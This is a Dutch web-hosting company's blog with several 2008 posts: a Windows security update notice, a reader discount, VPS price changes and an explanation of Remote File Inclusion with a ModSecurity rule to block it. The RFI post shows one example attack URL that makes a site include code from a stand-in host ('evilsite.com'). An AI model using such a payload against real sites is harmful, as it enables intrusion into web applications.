Donderdag 23 oktober heeft Microsoft een belangrijke security update uitgebracht. Wij hebben deze update onmiddelijk op al onze Windows servers geïmplementeerd en wij raden u aan hetzelfde te doen.
De zwakke plek is een zogenaamde Remote Code Execution, hierbij krijgt een computer die makkelijk extern benaderbaar is, zoals bijvoorbeeld een server, een RPC request dat compromiterende code bevat.
Zie hier voor meer informatie.
Onze marketing heeft zich de laatste twee jaar voor 100% op online kanalen gericht. Wij hebben echter besloten om vanaf nu ook advertenties in relevante bladen te gaan plaatsen.
Deze week hebben wij onze eerste advertentie in een blad geplaatst. Deze is te bewonderen in de editie van Web Designer Magazine
Omdat wij een speciale kortingsactie hebben voor nieuwe bestellingen die via deze advertentie binnenkomen hebben wij besloten dat de lezers van ons blog (zeker) ook een korting verdienen.
De actie
Voor alle lezers van dit blog geldt dat alle nieuwe VPS-gerelateerde bestellingen een korting van 10% krijgen voor het eerste jaar. Dit geldt zowel voor nieuwe producten als voor upgrades van bestaande producten. Voorwaarden zijn dat de bestelling tussen 14 oktober 2008 en 14 november 2008 wordt gedaan en dat u de code BLOG1008 invult op het bestelformulier of in de email met uw bestelling.
Veel VPS of servergebruikers zijn wel eens tegen het fenomeen ‘Gehackte Joomla’ of ‘Gehackte PHPbb’ aangelopen en hebben in de logfiles regels gezien waarbij Remote File Inclusion (RFI) te detecteren is. Bijvoorbeeld: http://jouw-joomlasite.nl/index.php?page=http://evilsite.com/code.php
Remote File Inclusion is een methode waarbij de aanvaller probeert een bestand met gevaarlijke code door een webapplicatie op de server van het slachtofer uit te laten voeren. De aanvaller zal dit doen door een url als waarde in te voeren in een variabele of parameter van de webapplicatie. Deze url verwijst vervolgens naar de gevaarlijke code die de webapplicatie in haar eigen code zal “includen” op het moment dat de url door het programma wordt aangeroepen.
Wanneer webapplicatie-programmeurs hier op bedacht zijn, dan is er niet zo veel aan de hand. Een url zoals hierboven beschreven kan dan geen kwaad aangezien de code van de software al rekening houdt met dit soort aanvallen en alle variabelen die eventueel zouden kunnen worden gemanipuleerd, worden dan automatisch ontdaan van dit soort waarden. In de praktijk gebeurt dit echter vaak niet. Vaak zijn grote webapplicaties niet meer het domein van 1 programmeur, zodat de kans groter is dat er op dit gebied missers worden gemaakt en gaten vallen in de software.
Ivan Ristic was zich hier in 2001 al goed van bewust en probeerde met bestaande tools dergelijke urls te herkennen om ze vervolgens met slimme mod_rewrite statements onschadelijk te maken. Al snel waren combinaties van bestaande middelen niet meer genoeg, waardoor hij in 2003 is begonnen aan ModSecurity.
ModSecurity is een Apache module die werkt als een Application Firewall:
Deze module scant het HTTP verkeer en vergelijkt dat verkeer met een “rule” in de mod_security configuratie. Vervolgens wordt aan de hand van deze vergelijking besloten of het gescande HTTP verkeer wordt toegelaten of geblokkeerd. Het voordeel van ModSecurity is dat het ook de inhoud van HTTP verkeer scant, zodat je op een dieper niveau verkeer kan tegenhouden.
Versie 2 van ModSecurity heeft met zijn CoreRules een basisset aan regels gemaakt die de meest voorkomende aanvallen tegenhoudt, waardoor het out-of-the-box makkelijker wordt om veelgebruikte aanvallen tegen te houden.
Door de flexibele opzet van ModSecurity zijn er goede regels te maken die ongewild HTTP verkeer tegenhouden. Op het internet zijn veel van dit soort rules te vinden die mensen hebben samengesteld om hun server te beschermen tegen aanvallen op webapplicaties.
Het formuleren van een mod_security regel die RFI stopt kan simpel zijn als:
SecRule ARGS|ARGS_NAMES "^http:/"
Deze rule houdt al het HTTP-verkeer tegen waarbij een variabele waarde (ARGS) begint met ‘http://’. Hierdoor vormen RFI-url’s geen bedreiging meer omdat ze door ModSecurity worden tegengehouden voordat ze bij de webapplicatie kunnen komen.
Lees verder om een installatie how-to te lezen.
(meer lezen…)
Er zijn veel hosting-bedrijven in Nederland en het komt redelijk vaak voor dat de eigenaaar zich na verloop van tijd op een andere activiteit wil storten. Het soepel verkopen en overdragen van het bedrijf en haar klanten wordt dan heel belangrijk.
XL Internet Services B.V., het moederbedrijf van XLS Hosting, heeft de afgelopen anderhalf jaar een aantal kleine en middelgrote ISPs met succes overgenomen. Op dit moment zijn wij op zoek naar nieuwe hosting-bedrijven ter overname.
Wij hebben de kennis en ervaring in huis om de overdracht soepel te laten verlopen, zowel op technisch als op administrief vlak. Eventuele overlast voor de klanten blijft tot een minimum beperkt en wij weten meestal snel verbeteringen voor onze nieuwe klanten door te voeren.
Wij zijn op zoek naar ISPs met een omzet van EUR 10,000 tot EUR 500,000+. Als u potentieel uw hosting activiteiten wilt overdragen neem dan contact met ons op via: hostingovername[at]xl-is.nl of een van onze XLS email adressen. Aarzel niet om ons ook te benaderen als niet direct wilt verkopen maar gewoon wat meer over het verkoop- en integratieproces wilt weten, wij delen onze kennis op dit gebied graag.
Een van de belangrijkste trends die wij zien op het gebied van online computer-capaciteit is computing on demand, hierbij betaalt de gebruiker alleen voor de capaciteit die daadwerkelijk gebruikt wordt. Virtuele servers spelen met hun flexibiliteit goed op deze trend in, maar dan moeten de contracten dat wel toelaten.
Om u toe te staan uw VPS nog flexibeler in te zetten kunt u al uw VPS gerelateerde diensten voortaan maandelijks wijzigen. Dit kan dan tot 1 dag voor het einde van uw contractmaand gebeuren.
Deze wijziging zal voor onze huidige klanten de volgende gevolgen hebben.
Wij hebben besloten de grotere VPSen en extra RAM goedkoper te maken om het makkelijker te maken meer capaciteiten aan uw VPS toe te voegen. De traffic limieten van de grotere VPSen zijn ook verhoogt, tevens is de prijs van een cPanel licentie omlaag gegaan.
Al onze prijswijzigingen gelden zowel voor bestaande als voor nieuwe klanten.
cPanel prijsverlaging
Door onze grotere schaalgrootte zijn de kosten van een cPanel licentie omlaag gegaan van EUR 11.95 tot EUR 9.95 per maand.
De VPS pakketten zijn als volgt gewijzigd (prijs per maand):
| Xen VPS | HDD GB | Traffic GB | RAM MB | Prijs EUR | ||
| VPS 3 | 40 | 400 | 400 | 512 | 34.95 | |
| VPS 4 | 80 | 800 | 1024 | 64.95 | ||
| VPS 5 | 160 | 1600 | 2048 | 119.95 | ||
| VPS 6 | 240 | 2400 | 3072 | 174.95 |
De kosten van extra RAM zijn als volgt gewijzigd:
| RAM | Prijs pm | |
| 128 MB | EUR 5.95 | |
| 256 MB | EUR 10.95 | |
| 512 MB | EUR 20.95 | |
| 1024 MB | EUR 39.95 |
Even een korte update over de belangrijkste verbeteringen waar wij op dit moment mee bezig zijn.
Windows VPSen
Wij krijgen steeds meer vragen voor Windows VPSen en willen deze dienst nu graag gaan leveren. Wij zijn op dit moment een Windows cluster aan het testen hopen dit product op korte termijn te gaan aanbieden. Zie deze blogpost http://blog.xlshosting.nl/nieuws/xls-windows-vpsen-op-stapel/ voor meer informatie.
Backup functionaliteit
De data op de harde schijf van uw VPS wordt zeer veilig opgeslagen. Soms is het echter nodig om terug te gaan naar data uit het verleden omdat de huidige gegevens gecorrumpeerd zijn geraakt, vaak door menselijk falen. Nu raden wij klanten die dit willen kunnen nog aan om van de backup-functionaliteit van het control panel gebruik te maken, wij voegen soms ook een tweede harde schijf toe met met een backup-script. Op dit moment zijn wij bezig met het ontwikkelen van een gebruiksvriendelijke centrale backup-and-restore service.
Nieuwe website
Wij zijn bezig met een nieuwe, frisse website waar u nog makkelijker informatie kunt vinden over virtualisatie, XLS en uw specifieke producten. Er zal ook een Engelse versie van deze nieuwe website worden gecreëerd samen met de mogelijkheid om met credit card te betalen.
